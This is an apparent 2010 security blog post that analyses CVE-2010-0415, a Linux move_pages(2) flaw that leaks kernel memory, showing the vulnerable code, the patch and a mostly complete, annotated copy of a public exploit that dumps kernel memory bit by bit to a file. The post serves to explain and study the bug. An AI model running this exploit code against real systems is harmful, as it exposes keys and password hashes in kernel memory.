xorl %eax, %eax

CVE-2010-0415: Linux kernel move_pages(2) Information Leak


This interesting vulnerability was discovered by Ramon de Carvalho Valle of IBM (a.k.a. ramon of Rise Security), as described in this bug report by Eugene Teo of Red Hat. The bug affects Linux kernels prior to 2.6.33-rc7 and is located in the code of the move_pages(2) system call. As its man page explains, this system call moves a set of memory pages to a different NUMA node, or reports the nodes on which those pages currently reside. Now, let’s have a look at the vulnerability.
The code for this system call resides in mm/migrate.c; here is the relevant snippet from the 2.6.32 release of the Linux kernel.

/*
 * Move a list of pages in the address space of the currently executing
 * process.
 */
SYSCALL_DEFINE6(move_pages, pid_t, pid, unsigned long, nr_pages,
                const void __user * __user *, pages,
                const int __user *, nodes,
                int __user *, status, int, flags)
{
        const struct cred *cred = current_cred(), *tcred;
        struct task_struct *task;
        struct mm_struct *mm;
        int err;
    ...
        if (nodes) {
                err = do_pages_move(mm, task, nr_pages, pages, nodes, status,
                                    flags);
        } else {
                err = do_pages_stat(mm, nr_pages, pages, status);
        }
    ...
}

So, ‘nodes’ is a user-controlled pointer that determines what the system call does. If it is non-NULL, the call goes to do_pages_move(); otherwise it goes to do_pages_stat(), as you can see in the snippet above. Let’s move to do_pages_move() now…

/*
 * Migrate an array of page address onto an array of nodes and fill
 * the corresponding array of status.
 */
static int do_pages_move(struct mm_struct *mm, struct task_struct *task,
                         unsigned long nr_pages,
                         const void __user * __user *pages,
                         const int __user *nodes,
                         int __user *status, int flags)
{
        struct page_to_node *pm;
        nodemask_t task_nodes;
        unsigned long chunk_nr_pages;
        unsigned long chunk_start;
        int err;
    ...
        /*
         * Store a chunk of page_to_node array in a page,
         * but keep the last one as a marker
         */
        chunk_nr_pages = (PAGE_SIZE / sizeof(struct page_to_node)) - 1;

        for (chunk_start = 0;
             chunk_start < nr_pages;
             chunk_start += chunk_nr_pages) {
    ...
                /* fill the chunk pm with addrs and nodes from user-space */
                for (j = 0; j < chunk_nr_pages; j++) {
                        const void __user *p;
                        int node;
    ...
                        if (get_user(node, nodes + j + chunk_start))
                                goto out_pm;

                        err = -ENODEV;
                        if (!node_state(node, N_HIGH_MEMORY))
                                goto out_pm;

                        err = -EACCES;
                        if (!node_isset(node, task_nodes))
                                goto out_pm;

                        pm[j].node = node;

                }

                /* End marker for this chunk */
                pm[chunk_nr_pages].node = MAX_NUMNODES;
    ...
                /* Return status information */
                for (j = 0; j < chunk_nr_pages; j++)
                        if (put_user(pm[j].status, status + j + chunk_start)) {
                                err = -EFAULT;
                                goto out_pm;
                        }
        }
        err = 0;

out_pm:
        free_page((unsigned long)pm);
out:
        return err;
}

In the above code the function enters a ‘for’ loop over each chunk, and then an inner loop that fills the page_to_node array with data taken from user space. It uses get_user() to fetch each node value directly from user space and then uses that value without any range check. The subsequent calls to node_state() and node_isset() end up in the following code from include/linux/nodemask.h:

extern nodemask_t node_states[NR_NODE_STATES];

#if MAX_NUMNODES > 1
static inline int node_state(int node, enum node_states state)
{
        return node_isset(node, node_states[state]);
}

and…

/* No static inline type checking - see Subtlety (1) above. */
#define node_isset(node, nodemask) test_bit((node), (nodemask).bits)

respectively, and as Eugene Teo noted in his comment:

(The node_isset and node_state functions just map to test_bit, which has no
limiter in the normal implementations.)
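To make the missing limiter concrete, here is a minimal user-space sketch (not kernel code) of a bit test that, like test_bit, trusts its index. The name sim_test_bit and the byte-wise addressing are assumptions made for illustration; they model the little-endian x86 layout, where bit nr lives in byte nr/8 (rounded down) of the bitmap.

```c
/*
 * Hypothetical user-space model of an unchecked bit test.
 * 'base' points at the first byte of a bitmap; 'nr' is a signed bit
 * index that is NOT validated against the bitmap size, so it can select
 * bytes before or after the bitmap. In this sketch the caller is
 * responsible for keeping the access inside one buffer.
 */
static int sim_test_bit(long nr, const unsigned char *base)
{
	/* floor(nr / 8), computed without right-shifting a negative value */
	long byte = (nr >= 0) ? nr / 8 : -((-nr + 7) / 8);
	int bit = (int)(nr - byte * 8);	/* always in 0..7 */

	return (base[byte] >> bit) & 1;
}
```

If a 4-byte bitmap sits at offset 4 of a 12-byte buffer, sim_test_bit(39, buf + 4) reads bit 7 of buf[8] and sim_test_bit(-8, buf + 4) reads bit 0 of buf[3]: both outside the bitmap, and nothing stops them.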

Thus the user can request any node value, including negative ones, and test_bit() will read the corresponding bit relative to the node_states[N_HIGH_MEMORY] bitmap, wherever in kernel memory that lands. Note that the put_user() loop in do_pages_move() only copies back ‘pm[j].status’; the result of the bit test reaches user space through the error code instead: -ENODEV if the bit was clear, any other outcome if it was set. Repeating the call with different node values therefore leaks kernel memory one bit at a time. It was fixed by applying the following patch:

                        err = -ENODEV;
+                       if (node < 0 || node >= MAX_NUMNODES)
+                               goto out_pm;
+
                        if (!node_state(node, N_HIGH_MEMORY))

The added check ensures that the signed integer ‘node’ is non-negative and smaller than the constant ‘MAX_NUMNODES’, which is defined in include/linux/numa.h like this:

#ifdef CONFIG_NODES_SHIFT
#define NODES_SHIFT     CONFIG_NODES_SHIFT
#else
#define NODES_SHIFT     0
#endif

#define MAX_NUMNODES    (1 << NODES_SHIFT)

#endif /* _LINUX_NUMA_H */
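The effect of the patch can be sketched in user space as follows. This is only an illustration: the SKETCH_ names are made up, and the shift value of 6 is an assumption (real kernels take it from CONFIG_NODES_SHIFT).

```c
/* Assumed value for this sketch; the kernel uses CONFIG_NODES_SHIFT. */
#define SKETCH_NODES_SHIFT   6
#define SKETCH_MAX_NUMNODES  (1 << SKETCH_NODES_SHIFT)

/*
 * Mirrors the patched condition: a node value is only acceptable as a
 * bit index if it lies in [0, MAX_NUMNODES).
 */
static int node_in_range(int node)
{
	return node >= 0 && node < SKETCH_MAX_NUMNODES;
}
```

With a shift of 6 the mask has 64 bits, so 0 and 63 pass while -1 and 64 are rejected before any bit test happens.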

Finally, let’s move to the more interesting part of the post: the exploitation.
Brad Spengler of grsecurity (a.k.a. spender) wrote and published an exploit for this vulnerability, named “exp_sieve.c”, which is available for download here. He also provides some background on how ramon discovered the vulnerability with his ‘flail’ fuzzer, as well as some useful exploitation notes. So…

#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"

#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)

int max_numnodes;

unsigned long node_online_map;

unsigned long node_states;

unsigned long our_base;
unsigned long totalhigh_pages;

#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
      ...
struct exploit_state *exp_state;

char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";

int get_exploit_state_ptr(struct exploit_state *ptr)
{
	exp_state = ptr;
	return 0;
}

int requires_null_page = 0;

As you can see, he uses his exploitation framework (known as enlightenment) in this exploit too. If you’re not familiar with it, the ‘exp_framework.h’ header file has enough comments to outline the functions and structures needed to use that API. For example, get_exploit_state_ptr() must be implemented so that the framework can hand the exploit a pointer to the ‘exp_state’ structure, as you can see above. Next, there are some helper functions…

void addr_to_nodes(unsigned long addr, int *nodes)
{
	int i;
	int min = 0x80000000 / 8;
	int max = 0x7fffffff / 8; 

	if ((addr < (our_base - min)) ||
	    (addr > (our_base + max))) {
		fprintf(stdout, "Error: Unable to dump address %p\n", addr);
		exit(1);
	}

	for (i = 0; i < 8; i++) {
		nodes[i] = ((int)(addr - our_base) << 3) | i;
	}

	return;
}

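This function converts a target kernel address into the eight ‘node’ values needed to read it. Each value is a signed bit index relative to ‘our_base’: the byte offset (addr - our_base) shifted left by three, ORed with the bit number 0 to 7. Because the index must fit in a signed 32-bit integer, only addresses within roughly 256MB below or above ‘our_base’ are reachable, which is what the ‘min’ and ‘max’ bounds check. The next one is: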

char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
	int nodes[8];
	int node;
	int status;
	int i;
	int ret;
	unsigned char tmp = 0;

	addr_to_nodes(addr, (int *)&nodes);
	for (i = 0; i < 8; i++) {
		node = nodes[i];
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno != ENODEV)
			tmp |= (1 << i);
	}
	
	return tmp;
}	

This is the actual “exploitation” function. It fills the ‘nodes[]’ array for the address in ‘addr’ using the previous function, then invokes the buggy system call once per bit with the corresponding ‘node’ value. An ‘ENOSYS’ error means the system call is not available on the system. An ‘ENODEV’ (a.k.a. “No such device”) error means the tested bit was clear; any other outcome means it was set, so the matching bit of the returned byte is turned on.
The next routine is also part of the enlightenment framework interface. It prints the exploit’s menu options, which are pretty simple as you can see here:
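The arithmetic behind these two helpers can be modelled without touching the kernel. The sketch below is an assumption-laden illustration: node_for and byte_from_results are hypothetical names, and the array of error codes stands in for the errno values that eight probes would produce.

```c
#include <errno.h>
#include <stdint.h>

/*
 * Hypothetical helper: signed bit index for bit 'bit' (0..7) of the byte
 * located 'byte_off' bytes away from the base bitmap.
 */
static int64_t node_for(int64_t byte_off, int bit)
{
	return byte_off * 8 + bit;
}

/*
 * Hypothetical helper: rebuild one byte from eight probe results, where
 * err[i] is the error code observed for bit i. ENODEV is read as a clear
 * bit, anything else as a set bit.
 */
static unsigned char byte_from_results(const int err[8])
{
	unsigned char value = 0;
	int i;

	for (i = 0; i < 8; i++)
		if (err[i] != ENODEV)
			value |= (unsigned char)(1u << i);
	return value;
}
```

For example, bit 3 of the byte just after the base has index 11, and the last bit of the byte just before it has index -1. The largest byte offset whose indices still fit in a signed 32-bit value is INT32_MAX / 8, which is where the 256MB reach comes from.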

void menu(void)
{
	fprintf(stdout, "Enter your choice:\n"
			" [0] Dump via symbol/address with length\n"
			" [1] Dump entire range to file\n"
			" [2] Quit\n");
}

Even though the next routine in the exploit code is the trigger function, we’ll skip this in order to move to the preparation one first. Here is the pre-exploitation function…

int prepare(unsigned char *ptr)
{
	int node;
	int found_gap = 0;
	int i;
	int ret;
	int status;

	totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
	node_states = exp_state->get_kernel_sym("node_states");
	node_online_map = exp_state->get_kernel_sym("node_online_map");

It uses the framework’s callbacks to look up three kernel symbols. ‘totalhigh_pages’ exists only when the ‘CONFIG_HIGHMEM’ option is enabled (it holds the total number of high memory pages), so finding it tells the exploit that HIGHMEM is configured. ‘node_states’ is the array of node bitmaps, one nodemask_t per node state, shown earlier in nodemask.h. ‘node_online_map’ is the bitmap of online nodes and, as spender notes in the update below, it is looked up to support older kernels.

	buf = malloc(4096);

	/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

After allocating 4KB using malloc(3), there's a neat trick to recover the size of each bitmap. Spender invokes move_pages(2) with node values from 0 to 511. An 'ENODEV' error means node_state() found the tested bit clear, so 'found_gap' is set. The first later node value that does not fail with 'ENODEV' is the first set bit of the adjacent bitmap in the node_states array; that index equals the bitmap size in bits, i.e. 'MAX_NUMNODES', so the code stores it in 'max_numnodes' and breaks out of the loop. As the comment says, this only works on systems with a single node.
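The size-detection logic can be reproduced on an ordinary byte array. This is a sketch under the single-node assumption stated in the exploit's comment; detect_bitmap_bits is a hypothetical name, and a set bit here plays the role of "the call did not fail with ENODEV".

```c
/*
 * Scan bit indices 0..limit-1 of 'bits'. Once at least one clear bit has
 * been seen (the "gap"), the next set bit marks the start of the
 * neighbouring bitmap, and its index is the bitmap size in bits.
 * Returns that index, or -1 if no such bit is found.
 */
static int detect_bitmap_bits(const unsigned char *bits, int limit)
{
	int found_gap = 0;
	int i;

	for (i = 0; i < limit; i++) {
		int set = (bits[i / 8] >> (i % 8)) & 1;

		if (!set)
			found_gap = 1;
		else if (found_gap)
			return i;
	}
	return -1;
}
```

With two adjacent 64-bit masks that each have only bit 0 set, the scan sees bit 0 set, bits 1 to 63 clear, and then bit 64 set, so it reports 64.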

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}
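As a worked example of the 'our_base' calculation in prepare(), the sketch below computes the address of one entry inside the node_states array. The helper name is hypothetical, and the entry indices (3 with HIGHMEM, 2 without) are taken from the exploit's own expression; they correspond to the position of N_HIGH_MEMORY in the 2.6.32-era node state enum, which is an assumption about that kernel's layout.

```c
/*
 * Hypothetical helper: address of node_states[N_HIGH_MEMORY], given the
 * address of the array, the detected bitmap size in bits and whether
 * HIGHMEM is configured. Each array entry is max_numnodes / 8 bytes.
 */
static unsigned long high_memory_mask_addr(unsigned long node_states_addr,
					   int max_numnodes, int has_highmem)
{
	unsigned long mask_bytes = (unsigned long)max_numnodes / 8;
	unsigned long index = has_highmem ? 3 : 2;

	return node_states_addr + index * mask_bytes;
}
```

With 64-bit masks (8 bytes each) and an array at the made-up address 0x1000, the base is 0x1018 on a HIGHMEM kernel and 0x1010 otherwise.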

The final segment of prepare() sets 'our_base', the address of the bitmap that the node values index into. If the 'node_online_map' symbol was found, it is used directly. Otherwise, if 'node_states' was found, the base is the address of an entry inside that array: each bitmap is 'max_numnodes / 8' bytes long, and the entry tested by move_pages(2), node_states[N_HIGH_MEMORY], is at index 3 when HIGHMEM is configured and at index 2 when it is not. If neither symbol is available, the exploit gives up and reports that the kernel doesn't appear vulnerable. Finally, we have the trigger routine which starts like this:

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];

This is a simple menu loop: it reads the user's input with fgets(3) and keeps going until the choice is '2', which stands for "Quit" as we saw in the menu() routine. A common 'switch-case' structure follows:

		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';

If the user chose option '0' ("Dump via symbol/address with length"), it reads the symbol or address with fgets(3), strips the trailing newline, and goes on to parse it like this:

			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;

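It first tries to resolve the input as a symbol through the framework's get_kernel_sym() callback; if that fails, it parses the input as a hexadecimal address with strtoul(3). If both yield zero, the input is rejected. Next, it asks for the number of bytes that the user wants to leak: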

			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				fscanf(stdin, "%x", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;

Nothing really complicated here. The length is added to the start address, so 'addr2' now holds the end address of the range to dump. The following code then uses a simple loop to perform the information leak:

			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {	
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;

This iterates up to the end address, fetching one byte per iteration with get_byte_at_addr() and printing it immediately. Finally, it prints a newline character and breaks out of the switch.
If the user selected option '1' ("Dump entire range to file" in the exploit's menu), the following code path is taken:

		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/* 
			   our lower bound will cause us to access
			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif

The start address is set to 256MB (0x10000000) below the base. A compile-time preprocessor conditional then selects the appropriate lower bound for 64-bit or 32-bit x86: the start is clamped so that it does not fall below the kernel's address range, since touching bad addresses would cause an oops. It continues like this:

 
			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

It sets the end address to 256MB (0x10000000 in hex) above the base and opens a file named "kernel.bin" for writing using fopen(3). Next…

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;

It invokes get_byte_at_addr() for every address in the range, up to 256MB on each side of the base, and writes each byte to the previously opened file stream. It shows progress by printing a dot every 128KB and a "done." message on completion. Then it closes the file and breaks out of the switch. Finally, if the selection was '2', which stands for "Quit", the case does nothing and the 'while' condition ends the loop:

		case '2':
			break;
		}
	}

	return 0;
}
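To get a feel for the dump window used by option '1' and why the exploit warns that it "will take a while", here is a small sketch of the range arithmetic for the x86_64 case. The helper and macro names are hypothetical; the constants are the ones that appear in the exploit code above.

```c
#include <stdint.h>

#define DUMP_WINDOW          0x10000000ULL          /* 256MB on each side */
#define X86_64_KERNEL_FLOOR  0xffffffff80000000ULL  /* lower bound on x86_64 */

/* Start of the dump: 256MB below the base, clamped to the floor. */
static uint64_t dump_start_x86_64(uint64_t base)
{
	uint64_t start = base - DUMP_WINDOW;

	if (start < X86_64_KERNEL_FLOOR)
		start = X86_64_KERNEL_FLOOR;
	return start;
}

/* End of the dump: 256MB above the base. */
static uint64_t dump_end(uint64_t base)
{
	return base + DUMP_WINDOW;
}

/* One system call per bit, so eight probes per dumped byte. */
static uint64_t probes_needed(uint64_t start, uint64_t end)
{
	return (end - start) * 8;
}
```

For a base far enough above the floor, the window is the full 512MB and needs 2^32 probes; for a base closer to the floor, the start is clamped and the dump is correspondingly shorter.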

Finally, the post-exploitation function is empty, since this exploit leaves the kernel in a stable state that doesn't require any clean-up.

int post(void)
{
	return 0;
}

You can also see this exploit in action in a video that spender uploaded to YouTube, which is available here.

P.S.: There might be mistakes in this post since I wrote it really, really quick and didn’t pay the appropriate attention because I didn’t have the time to do so, sorry.

Update:
A couple of minutes after I published this post, spender informed me about some mistakes in it. Thanks once again for this. Since I don’t have much time, here are his comments in his own words; I’m just copying and pasting them:

Should have shown the definition of node_states, as it would explain why I bother trying to figure out the bitmap size and explains the calculation involving highmem detection; also the range is 512MB (256MB below the base, 256MB above). The node_online_map lookup is for older kernel support; ENODEV means the tested bit was 0, anything else (e.g. EACCES) means it was 1.

Written by xorl

February 25, 2010 at 00:58

Posted in bugs, linux

4 Responses


  1. What is the level of threat posed by CVE-2010-0415 vulnerability to Linux Systems;

    vijay

    May 5, 2010 at 13:43

  2. how to deliver the exploit code to the target system ??

    bapine

    May 6, 2010 at 20:59

  3. @bapine: AFAIK this is only locally exploitable meaning that you somehow need to have local access in order to deliver the exploit code to the vulnerable system.

    xorl

    September 13, 2010 at 18:00

  4. @vijay: As with most infoleak vulnerabilities, it’s difficult to state its level of threat. However, since it could leak a large amount of memory, it’s possible that this memory dump will contain sensitive information. That is anything from cryptographic keys to even copies of /etc/shadow.

    xorl

    September 13, 2010 at 18:03

